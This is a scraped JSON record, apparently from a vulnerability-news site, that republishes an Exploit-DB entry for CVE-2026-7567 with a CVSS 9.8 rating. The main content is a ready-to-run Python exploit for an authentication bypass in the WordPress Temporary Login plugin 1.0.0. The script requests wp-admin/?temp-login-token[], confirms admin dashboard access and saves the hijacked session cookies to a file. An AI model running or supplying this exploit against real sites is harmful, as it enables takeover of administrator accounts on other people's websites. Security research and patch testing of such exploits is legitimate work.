{“lastseen”:”2026-05-26T15:27:57″,”description”:”Exploit Title: WordPress Temporary Login Plugin 1.0.0 – ‘temp-login-token’ Authentication Bypass to Account Takeover Date: 2026-05-02 Exploit Author: Amir Hossein Jamshidi Vendor Homepage: https:\/\/wordpress.org Software Link:…”,”published”:”2026-05-26T00:00:00″,”modified”:”2026-05-26T00:00:00″,”type”:”exploitdb”,”title”:”Wordpress Temporary Login Plugin 1.0.0 – \\u0026#039;temp-login-token\\u0026#039; Authentication Bypass to Account Takeover”,”source”:””,”references”:””,”id”:”EDB-ID:52575″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-7567″],”sourceData”:”# Exploit Title: WordPress Temporary Login Plugin 1.0.0 – ‘temp-login-token’ Authentication Bypass to Account Takeover\\r\\n# Date: 2026-05-02\\r\\n# Exploit Author: Amir Hossein Jamshidi\\r\\n# Vendor Homepage: https:\/\/wordpress.org\\r\\n# Software Link: https:\/\/downloads.wordpress.org\/plugin\/temporary-login.1.0.0.zip\\r\\n# Version: \\u003c= 1.0.0\\r\\n# Tested on: Linux\\r\\n# CVE : CVE-2026-7567\\r\\n\\r\\n\\r\\n#!\/usr\/bin\/env python3\\r\\nimport requests\\r\\n\\r\\nprint(”’\\r\\n#################################################################################\\r\\n# Temporary Login Plugin \\u003c= 1.0.0 – ‘temp-login-token’ Authentication Bypass #\\r\\n# BY: Amir Hossein Jamshidi #\\r\\n# Mail: amirhosseinjamshidi64@gmail.com #\\r\\n# github: https:\/\/github.com\/amirhosseinjamshidi64 #\\r\\n# Usage: python Exploit.py #\\r\\n#################################################################################\\r\\n”’)\\r\\n\\r\\n# Target URL – CHANGE THIS to your WordPress URL\\r\\ntarget = input(\\”Enter Target (example: https:\/\/evil.com\/): \\”)\\r\\nurl = target + \\”wp-admin\/?temp-login-token[]\\”\\r\\nprint(\\”[*] Sending exploit request…\\”)\\r\\nresponse = requests.get(url, allow_redirects=True)\\r\\n\\r\\nprint(f\\”[*] Final URL: {response.url}\\”)\\r\\nprint(f\\”[*] Response status: {response.status_code}\\”)\\r\\n\\r\\n# Check if we got admin cookies\\r\\nif ‘wp-settings-time’ in str(response.cookies):\\r\\n print(\\”[\u2713] SUCCESS! Authentication bypassed!\\”)\\r\\n print(\\”[\u2713] WordPress logged-in cookie found\\”)\\r\\n # Try to access admin area with the same session\\r\\n admin_check = requests.get(\\r\\n response.url.replace(‘wp-login.php’, ‘wp-admin\/’),\\r\\n cookies=response.cookies\\r\\n )\\r\\n if ‘Dashboard’ in admin_check.text or ‘wp-admin’ in admin_check.url:\\r\\n print(\\”[\u2713] Full admin access confirmed!\\”)\\r\\n print(\\”[\u2713] You are now logged in as a temporary user\\”)\\r\\n else:\\r\\n print(\\”[!] Logged in but no admin access (user may have limited role)\\”)\\r\\nelse:\\r\\n print(\\”[-] Exploit failed. Reasons:\\”)\\r\\n print(\\” – Plugin not installed or not version 1.0.0\\”)\\r\\n print(\\” – No temporary users exist\\”)\\r\\n print(\\” – Plugin is patched\\”)\\r\\n# Save cookies for manual browsing\\r\\nwith open(‘wordpress_cookies.txt’, ‘w’) as f:\\r\\n for cookie in response.cookies:\\r\\n f.write(f\\”{cookie.name}={cookie.value}\\\\n\\”)\\r\\nprint(\\”[*] Cookies saved to wordpress_cookies.txt\\”)”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52575″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52575″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-26T15:27:57″,”description”:”Exploit Title: WordPress Temporary Login Plugin 1.0.0 – ‘temp-login-token’ Authentication Bypass to Account Takeover Date: 2026-05-02 Exploit Author: Amir Hossein Jamshidi Vendor Homepage: https:\/\/wordpress.org Software…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-56931","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n